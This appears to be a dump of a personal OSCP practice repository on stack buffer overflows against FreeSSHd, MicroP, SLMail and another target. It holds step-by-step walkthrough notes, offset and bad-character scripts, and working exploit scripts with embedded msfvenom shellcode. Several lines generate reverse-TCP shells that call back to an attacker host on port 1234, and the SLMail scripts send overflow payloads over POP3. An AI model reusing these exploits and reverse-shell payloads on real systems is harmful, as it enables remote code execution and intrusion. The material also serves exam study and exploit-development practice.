| sys.exit() 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | -------------------------------------------------------------------------------- /BufferOverflow/Freesshd/wakjhtough: -------------------------------------------------------------------------------- 1 | /Freesshd 2 | 3 | 4 | IP:192.168.43.156 5 | Port 22 (ssh) 6 | ___________________________________________________ 7 | 1. Fuzzing remote conectiona dn find crash poin 20400 8 | 9 | 2. Sending patten and find offset -l 20400 and find vlaue of EIP (326A4231) TOS (6A42346A) 10 | 11 | 3. finding offset vlaue 1055 | 1063 12 | 13 | 14 | 4. Finding bad char {\x00} 15 | 16 | 17 | 5. finding JMP ESP !mona find -s "\xff\xe4" -m user32.dll 18 | 19 | 6. Control EIP 20 | 21 | 22 | 7. . SHellcode {msfvenom -p windows/shell_reverse_tcp LHOS=192.168.43.223 LPORT=1234 EXITFUNC=thread -f c -b "\x00" 23 | } 24 | 25 | 26 | * launch shellcode and take connection 27 | 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/Bad_char.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #micro Op crashing mppl file crashing script 4 | 5 | file =open("bad_char.mppl", "wb") 6 | 7 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 8 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 10 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 11 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 12 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 13 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 14 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 15 | 16 | buffer ="A" * 1276 + "B" * 4 + badchars 17 | 18 | file.write(buffer) 19 | 20 | file.close() 21 | 22 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/Bad_char2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #micro Op crashing mppl file crashing script 4 | 5 | file =open("bad_char2.mppl", "wb") 6 | 7 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 8 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 10 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 11 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 12 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 13 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 14 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 15 | 16 | buffer ="A" * 1276 + "B" * 4 + badchars 17 | 18 | file.write(buffer) 19 | 20 | file.close() 21 | 22 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/Bad_char3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #micro Op crashing mppl file crashing script 4 | 5 | file =open("bad_char3.mppl", "wb") 6 | 7 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 8 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 10 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 11 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 12 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 13 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 14 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 15 | 16 | buffer ="A" * 1276 + "B" * 4 + badchars 17 | 18 | file.write(buffer) 19 | 20 | file.close() 21 | 22 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/Eip_control.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mrnmap/OSCP2020/f1cca5e58d298e56564cd87715b0469ab2eb5e73/BufferOverflow/MicroP/Eip_control.mppl -------------------------------------------------------------------------------- /BufferOverflow/MicroP/bad_char.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mrnmap/OSCP2020/f1cca5e58d298e56564cd87715b0469ab2eb5e73/BufferOverflow/MicroP/bad_char.mppl -------------------------------------------------------------------------------- /BufferOverflow/MicroP/bad_char2.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mrnmap/OSCP2020/f1cca5e58d298e56564cd87715b0469ab2eb5e73/BufferOverflow/MicroP/bad_char2.mppl -------------------------------------------------------------------------------- /BufferOverflow/MicroP/bad_char3.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mrnmap/OSCP2020/f1cca5e58d298e56564cd87715b0469ab2eb5e73/BufferOverflow/MicroP/bad_char3.mppl -------------------------------------------------------------------------------- /BufferOverflow/MicroP/eip_control-py.txt: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #micro Op crashing mppl file crashing script 4 | 5 | file =open("Eip_control.mppl", "wb") 6 | 7 | 8 | 9 | buffer ="A" * 1276 + "B" * 4 + "C" * 300 10 | 11 | file.write(buffer) 12 | 13 | file.close() 14 | 15 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/eip_control.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #micro Op crashing mppl file crashing script 4 | 5 | file =open("Eip_control.mppl", "wb") 6 | 7 | 8 | 9 | buffer ="A" * 1276 + "\x7b\x95\xad\x74" + "C" * 300 10 | 11 | file.write(buffer) 12 | 13 | file.close() 14 | 15 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #micro Op crashing mppl file crashing script 4 | 5 | file =open("offset.mppl", "wb") 6 | 7 | buffer ="A" * 1276 + "B" * 4 + "C" * 300 8 | 9 | file.write(buffer) 10 | 11 | file.close() 12 | 13 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/raw_shellcode: -------------------------------------------------------------------------------- 1 | msfvenom -p windows/messagebox -f c -b "\x00\x0a\x0d" 2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload 3 | [-] No arch selected, selecting arch: x86 from the payload 4 | Found 11 compatible encoders 5 | Attempting to encode payload with 1 iterations of x86/shikata_ga_nai 6 | x86/shikata_ga_nai succeeded with size 299 (iteration=0) 7 | x86/shikata_ga_nai chosen with final size 299 8 | Payload size: 299 bytes 9 | Final size of c file: 1280 bytes 10 | unsigned char buf[] = 11 | "\xba\xba\xda\x14\xfb\xdb\xd2\xd9\x74\x24\xf4\x5e\x33\xc9\xb1" 12 | "\x45\x83\xee\xfc\x31\x56\x0e\x03\xec\xd4\xf6\x0e\xc9\x02\x6d" 13 | "\x29\x9d\xf0\x66\xfb\x8f\x4b\xf1\xcd\xe6\xc8\x75\x5c\xc8\x9b" 14 | "\xfc\x93\xa3\xea\x1c\x27\xf5\x1a\x96\x49\xd9\x91\x9e\x8d\x56" 15 | "\xbe\xab\x1e\x31\xbf\x82\x1e\x20\xdf\xaf\x8d\x86\x04\x3b\x08" 16 | "\xfa\xcf\x6f\xbb\x7a\xd1\x65\x30\x30\xc9\xf2\x1d\xe4\xe8\xef" 17 | "\x41\xd0\xa3\x64\xb1\x93\x35\x95\x8b\x5c\x04\xa9\x10\x0e\xe3" 18 | "\xe9\x9d\x49\x2d\x26\x50\x54\x6a\x52\x9f\x6d\x08\x81\x48\xe4" 19 | "\x11\x42\xd2\x22\xd3\xbe\x85\xa1\xdf\x0b\xc1\xef\xc3\x8a\x3e" 20 | "\x84\xf8\x07\xc1\x72\x89\x5c\xe6\x9e\xeb\x9f\x54\x96\xc2\xcb" 21 | "\x10\x43\x9d\x36\x4a\x05\xd0\xb8\x67\x4b\x05\x5b\x88\x94\x2a" 22 | "\xed\x32\x6e\x6e\x90\x64\x8c\xe3\xea\x89\x74\x56\x1d\x3f\x8b" 23 | "\xa9\x22\xc9\x36\x5e\xb5\xa6\xd4\x7e\x04\x5f\x17\x4d\xa8\xfb" 24 | "\x3f\xc4\xc7\x66\xcd\x16\xf3\xe1\x6d\x73\x09\x7b\x6b\x2d\xf2" 25 | "\x2e\x77\x5b\xce\x81\xcc\xf3\x6d\x6c\x8e\x83\x6e\x4b\xbc\x63" 26 | "\xd1\x6c\xbf\x8b\x86\xfd\x47\x2c\x77\x6a\xd6\xab\x12\x28\x70" 27 | "\x79\xb8\xdf\xf3\xb0\x99\xa8\xaf\x96\x17\x20\xac\xbf\x7f\x12" 28 | "\x12\x60\xe8\x1f\x01\x26\xc9\xf7\xd7\xc9\x64\x28\x7f\x79\x5b" 29 | "\x08\x19\xed\xeb\x2d\x89\x81\xda\x64\xd9\x16\x39\x67\x50\x47" 30 | "\x70\x55\x30\xdb\x22\x0b\x4b\x0b\xf5\x6b\xe3\x53\xa3\x63"; 31 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/shellcode.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mrnmap/OSCP2020/f1cca5e58d298e56564cd87715b0469ab2eb5e73/BufferOverflow/MicroP/shellcode.mppl -------------------------------------------------------------------------------- /BufferOverflow/MicroP/shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #micro Op crashing mppl file crashing script 4 | #msfvenom -p windows/messagebox -f c -b "\x00\x0a\x0d" 5 | 6 | file =open("shellcode.mppl", "wb") 7 | 8 | shellcode=("\xdd\xc4\xd9\x74\x24\xf4\x58\xbb\x74\x35\x1d\xbb\x31\xc9\xb1" 9 | "\x45\x31\x58\x17\x03\x58\x17\x83\xb4\x31\xff\x4e\xed\xd1\x64" 10 | "\x69\x79\x02\x6f\xbb\x53\xf8\xf8\x8d\x9a\x99\x8d\x9f\x2c\xe9" 11 | "\xe4\x53\xc7\x9b\x14\xe7\x91\x6b\xae\x89\x3d\xe7\x86\x4d\x72" 12 | "\xef\x93\x5e\xd5\x0e\x8d\x5e\x04\x70\xa6\xcd\xe2\x55\x33\x48" 13 | "\xd6\x1e\x17\x7b\x5e\x20\x72\xf0\xd4\x3a\x09\x5d\xc8\x3b\xe6" 14 | "\x81\x3c\x75\x73\x71\xb7\x84\x6d\x4b\x38\xb7\xb1\x50\x6a\x3c" 15 | "\xf1\xdd\x75\xfc\x3d\x10\x78\x39\x2a\xdf\x41\xb9\x89\x08\xc0" 16 | "\xa0\x59\x12\x0e\x22\xb5\xc5\xc5\x28\x02\x81\x83\x2c\x95\x7e" 17 | "\xb8\x49\x1e\x81\x56\xd8\x64\xa6\xba\xba\xa7\x14\xca\x15\xfc" 18 | "\xd0\x2f\xec\x3e\x8a\x21\xa1\xb0\xa7\x6f\xd6\x52\xc8\x70\xd9" 19 | "\xe4\x72\x8a\x9d\x89\xa4\x70\x92\xf2\x49\x50\x07\x15\xff\x67" 20 | "\x58\x1a\x89\xd2\xaf\x8d\xe6\xb0\x8f\x0c\x9f\x7b\xe2\xa0\x3b" 21 | "\x13\x77\xce\xa6\x91\x47\xeb\xa1\x09\x8c\x01\x3b\x57\x9a\xea" 22 | "\x6e\x93\xaa\xd7\xc1\x20\x04\x75\xac\xea\xd2\x66\x0b\x40\x35" 23 | "\xc9\xac\x9b\x3a\x9e\x3d\x1b\x9d\x7f\xaa\xba\x7a\xe5\x68\x54" 24 | "\xc8\x80\x1f\xd7\xe3\x91\x68\x4b\x20\x2c\xe0\x90\x40\x68\xd2" 25 | "\x76\xb1\xe0\x5f\x25\xf7\xd1\x37\xbb\x98\x7c\xe8\x53\x08\x53" 26 | "\xc8\xc5\xbe\xe3\x6d\x65\x53\xc5\xa4\xfd\xe7\x01\x27\x74\x16" 27 | "\x78\x95\xd4\x8a\x2a\x4b\x27\xfc\xfc\xab\x87\x02\xab\x23") 28 | 29 | 30 | buffer = "\x90" * 24 31 | buffer += shellcode 32 | buffer += "\x90" * (1276 -len(buffer)) 33 | buffer += "\x7b\x95\xad\x74" 34 | 35 | file.write(buffer) 36 | 37 | file.close() 38 | 39 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/shellcode2.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mrnmap/OSCP2020/f1cca5e58d298e56564cd87715b0469ab2eb5e73/BufferOverflow/MicroP/shellcode2.mppl -------------------------------------------------------------------------------- /BufferOverflow/MicroP/shellcode2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #micro Op crashing mppl file crashing script 4 | #msfvenom -p windows/messagebox -f c -b "\x00\x0a\x0d" 5 | 6 | file =open("shellcode2.mppl", "wb") 7 | 8 | shellcode=("\xdd\xc4\xbe\xc4\x84\x66\xbc\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 9 | "\x52\x83\xea\xfc\x31\x72\x13\x03\xb6\x97\x84\x49\xca\x70\xca" 10 | "\xb2\x32\x81\xab\x3b\xd7\xb0\xeb\x58\x9c\xe3\xdb\x2b\xf0\x0f" 11 | "\x97\x7e\xe0\x84\xd5\x56\x07\x2c\x53\x81\x26\xad\xc8\xf1\x29" 12 | "\x2d\x13\x26\x89\x0c\xdc\x3b\xc8\x49\x01\xb1\x98\x02\x4d\x64" 13 | "\x0c\x26\x1b\xb5\xa7\x74\x8d\xbd\x54\xcc\xac\xec\xcb\x46\xf7" 14 | "\x2e\xea\x8b\x83\x66\xf4\xc8\xae\x31\x8f\x3b\x44\xc0\x59\x72" 15 | "\xa5\x6f\xa4\xba\x54\x71\xe1\x7d\x87\x04\x1b\x7e\x3a\x1f\xd8" 16 | "\xfc\xe0\xaa\xfa\xa7\x63\x0c\x26\x59\xa7\xcb\xad\x55\x0c\x9f" 17 | "\xe9\x79\x93\x4c\x82\x86\x18\x73\x44\x0f\x5a\x50\x40\x4b\x38" 18 | "\xf9\xd1\x31\xef\x06\x01\x9a\x50\xa3\x4a\x37\x84\xde\x11\x50" 19 | "\x69\xd3\xa9\xa0\xe5\x64\xda\x92\xaa\xde\x74\x9f\x23\xf9\x83" 20 | "\xe0\x19\xbd\x1b\x1f\xa2\xbe\x32\xe4\xf6\xee\x2c\xcd\x76\x65" 21 | "\xac\xf2\xa2\x2a\xfc\x5c\x1d\x8b\xac\x1c\xcd\x63\xa6\x92\x32" 22 | "\x93\xc9\x78\x5b\x3e\x30\xeb\xa4\x17\x3a\x6c\x4c\x6a\x3a\x76" 23 | "\x5f\xe3\xdc\x1c\x4f\xa2\x77\x89\xf6\xef\x03\x28\xf6\x25\x6e" 24 | "\x6a\x7c\xca\x8f\x25\x75\xa7\x83\xd2\x75\xf2\xf9\x75\x89\x28" 25 | "\x95\x1a\x18\xb7\x65\x54\x01\x60\x32\x31\xf7\x79\xd6\xaf\xae" 26 | "\xd3\xc4\x2d\x36\x1b\x4c\xea\x8b\xa2\x4d\x7f\xb7\x80\x5d\xb9" 27 | "\x38\x8d\x09\x15\x6f\x5b\xe7\xd3\xd9\x2d\x51\x8a\xb6\xe7\x35" 28 | "\x4b\xf5\x37\x43\x54\xd0\xc1\xab\xe5\x8d\x97\xd4\xca\x59\x10" 29 | "\xad\x36\xfa\xdf\x64\xf3\x1a\x02\xac\x0e\xb3\x9b\x25\xb3\xde" 30 | "\x1b\x90\xf0\xe6\x9f\x10\x89\x1c\xbf\x51\x8c\x59\x07\x8a\xfc" 31 | "\xf2\xe2\xac\x53\xf2\x26") 32 | 33 | 34 | buffer = "\x90" * 24 35 | buffer += shellcode 36 | buffer += "\x90" * (1276 -len(buffer)) 37 | buffer += "\x7b\x95\xad\x74" 38 | 39 | file.write(buffer) 40 | 41 | file.close() 42 | 43 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/walkthough_microp: -------------------------------------------------------------------------------- 1 | Micro_op app use .mppl file 2 | APp MicroOp 3 | ip 192.168.0.134 4 | Port - NA 5 | ______________All file send in win directly for explit____________________ 6 | 7 | 1. crashsing buffer (.mpll file ) A*4000 8 | 2. Finding EIP and offset =>71423571 (/pattern_offset.rb -l 4000 -q 71423571 9 | [*] Exact match at offset 1276) 10 | 11 | 3. checkl for eip controled at 1276 sednd paylaod with "A" * 1276 +"B" * 4 +"C" 8300 12 | 13 | 4. cehck all data comein buffer 14 | 15 | 5. finding bad character run bad -cahr.mpll and cehck EAX register (0048dd1c+514) 16 | bad cahr=\x00\x0a\x0d\ 17 | 18 | 6. now we arefer to EAX so let find JMP EAX {00000000 FFE0 JMP EAX} 19 | 20 | 7. !mona modules | !mona find -s "\xff\xe0" -m user32.dll 21 | 22 | Log data, item 24 23 | Address=7595509B 24 | Message= 0x7595509b (b+0x003f509b) : "\xff\xe0" | {PAGE_READONLY} [shell32.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7601.17514 (C:\Windows\syswow64\shell32.dll) 25 | 26 | 8. EIp control JMP eax (74AD957B)} = >"\x7b\x95\xad\x74" 27 | 28 | 9 .Shellcode 29 | 30 | msfvenom -p windows/messagebox -f -c -b "\x00\x0a\x0d" 31 | 10 revershe shell 32 | msfvenom -p windows/shell_reverse_tcp LHOS=1192.168.0.135 LPORT=1234 EXITFUNC=thread -f c -b "\x00\x0a\x0d -------------------------------------------------------------------------------- /BufferOverflow/SLMail/Bad_char.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | badchar=("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 5 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f" 6 | "\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 7 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 8 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 9 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 10 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 11 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 12 | ) 13 | 14 | buffer="A"*2606+"BBBB"+badchar 15 | print ("Size %s"%(len(buffer))) 16 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | connect=s.connect(('192.168.0.134',110)) 18 | s.recv(1024) 19 | s.send('USER test\r\n') 20 | s.recv(1024) 21 | s.send('PASS ' + buffer + '\r\n') 22 | s.send('QUIT\r\n') -------------------------------------------------------------------------------- /BufferOverflow/SLMail/EIP_control.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import struct 4 | 5 | jmp_esp= struct.pack(" 39694438 10 | 11 | 3. Find Offset 2606 12 | 13 | 4. EIP control 14 | buffer="A"*2606+"BBBB" +"DDDD" 15 | 16 | 5. Find JMP ESP => !mona modules (no bad char to ensure) 17 | !mona find -s "\xff\xe4" -m slmfc.dll 18 | 5F4A358F 19 | 20 | 6. FInd Bad Char "\x00\x0a\x0d" 21 | 22 | JMP ESP 5F4A358F 23 | 24 | 7. FInal Shell code msfvenom -p windows/shell_reverse_tcp LHOS=192.168.0.135 LPORT=1234 EXITFUNC=thread -f c -b "\x00\x0a\x0d" 25 | 26 | 27 | -------------------------------------------------------------------------------- /BufferOverflow/SLMail/Shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import struct 4 | 5 | 6 | Shellcode=("\xb8\x3e\x17\x16\xe8\xdb\xd0\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" 7 | "\x52\x83\xc2\x04\x31\x42\x0e\x03\x7c\x19\xf4\x1d\x7c\xcd\x7a" 8 | "\xdd\x7c\x0e\x1b\x57\x99\x3f\x1b\x03\xea\x10\xab\x47\xbe\x9c" 9 | "\x40\x05\x2a\x16\x24\x82\x5d\x9f\x83\xf4\x50\x20\xbf\xc5\xf3" 10 | "\xa2\xc2\x19\xd3\x9b\x0c\x6c\x12\xdb\x71\x9d\x46\xb4\xfe\x30" 11 | "\x76\xb1\x4b\x89\xfd\x89\x5a\x89\xe2\x5a\x5c\xb8\xb5\xd1\x07" 12 | "\x1a\x34\x35\x3c\x13\x2e\x5a\x79\xed\xc5\xa8\xf5\xec\x0f\xe1" 13 | "\xf6\x43\x6e\xcd\x04\x9d\xb7\xea\xf6\xe8\xc1\x08\x8a\xea\x16" 14 | "\x72\x50\x7e\x8c\xd4\x13\xd8\x68\xe4\xf0\xbf\xfb\xea\xbd\xb4" 15 | "\xa3\xee\x40\x18\xd8\x0b\xc8\x9f\x0e\x9a\x8a\xbb\x8a\xc6\x49" 16 | "\xa5\x8b\xa2\x3c\xda\xcb\x0c\xe0\x7e\x80\xa1\xf5\xf2\xcb\xad" 17 | "\x3a\x3f\xf3\x2d\x55\x48\x80\x1f\xfa\xe2\x0e\x2c\x73\x2d\xc9" 18 | "\x53\xae\x89\x45\xaa\x51\xea\x4c\x69\x05\xba\xe6\x58\x26\x51" 19 | "\xf6\x65\xf3\xf6\xa6\xc9\xac\xb6\x16\xaa\x1c\x5f\x7c\x25\x42" 20 | "\x7f\x7f\xef\xeb\xea\x7a\x78\xd4\x43\x84\xff\xbc\x91\x84\xfb" 21 | "\xee\x1f\x62\x69\x1f\x76\x3d\x06\x86\xd3\xb5\xb7\x47\xce\xb0" 22 | "\xf8\xcc\xfd\x45\xb6\x24\x8b\x55\x2f\xc5\xc6\x07\xe6\xda\xfc" 23 | "\x2f\x64\x48\x9b\xaf\xe3\x71\x34\xf8\xa4\x44\x4d\x6c\x59\xfe" 24 | "\xe7\x92\xa0\x66\xcf\x16\x7f\x5b\xce\x97\xf2\xe7\xf4\x87\xca" 25 | "\xe8\xb0\xf3\x82\xbe\x6e\xad\x64\x69\xc1\x07\x3f\xc6\x8b\xcf" 26 | "\xc6\x24\x0c\x89\xc6\x60\xfa\x75\x76\xdd\xbb\x8a\xb7\x89\x4b" 27 | "\xf3\xa5\x29\xb3\x2e\x6e\x49\x56\xfa\x9b\xe2\xcf\x6f\x26\x6f" 28 | "\xf0\x5a\x65\x96\x73\x6e\x16\x6d\x6b\x1b\x13\x29\x2b\xf0\x69" 29 | "\x22\xde\xf6\xde\x43\xcb") 30 | jmp_esp= struct.pack("625011AF" 5 | 6 | exploit=("\xdb\xd1\xbb\xb1\x96\x2f\x26\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 7 | "\x52\x83\xc2\x04\x31\x5a\x13\x03\xeb\x85\xcd\xd3\xf7\x42\x93" 8 | "\x1c\x07\x93\xf4\x95\xe2\xa2\x34\xc1\x67\x94\x84\x81\x25\x19" 9 | "\x6e\xc7\xdd\xaa\x02\xc0\xd2\x1b\xa8\x36\xdd\x9c\x81\x0b\x7c" 10 | "\x1f\xd8\x5f\x5e\x1e\x13\x92\x9f\x67\x4e\x5f\xcd\x30\x04\xf2" 11 | "\xe1\x35\x50\xcf\x8a\x06\x74\x57\x6f\xde\x77\x76\x3e\x54\x2e" 12 | "\x58\xc1\xb9\x5a\xd1\xd9\xde\x67\xab\x52\x14\x13\x2a\xb2\x64" 13 | "\xdc\x81\xfb\x48\x2f\xdb\x3c\x6e\xd0\xae\x34\x8c\x6d\xa9\x83" 14 | "\xee\xa9\x3c\x17\x48\x39\xe6\xf3\x68\xee\x71\x70\x66\x5b\xf5" 15 | "\xde\x6b\x5a\xda\x55\x97\xd7\xdd\xb9\x11\xa3\xf9\x1d\x79\x77" 16 | "\x63\x04\x27\xd6\x9c\x56\x88\x87\x38\x1d\x25\xd3\x30\x7c\x22" 17 | "\x10\x79\x7e\xb2\x3e\x0a\x0d\x80\xe1\xa0\x99\xa8\x6a\x6f\x5e" 18 | "\xce\x40\xd7\xf0\x31\x6b\x28\xd9\xf5\x3f\x78\x71\xdf\x3f\x13" 19 | "\x81\xe0\x95\xb4\xd1\x4e\x46\x75\x81\x2e\x36\x1d\xcb\xa0\x69" 20 | "\x3d\xf4\x6a\x02\xd4\x0f\xfd\xed\x81\x0e\x6e\x85\xd3\x10\x94" 21 | "\x84\x5d\xf6\xfe\x38\x08\xa1\x96\xa1\x11\x39\x06\x2d\x8c\x44" 22 | "\x08\xa5\x23\xb9\xc7\x4e\x49\xa9\xb0\xbe\x04\x93\x17\xc0\xb2" 23 | "\xbb\xf4\x53\x59\x3b\x72\x48\xf6\x6c\xd3\xbe\x0f\xf8\xc9\x99" 24 | "\xb9\x1e\x10\x7f\x81\x9a\xcf\xbc\x0c\x23\x9d\xf9\x2a\x33\x5b" 25 | 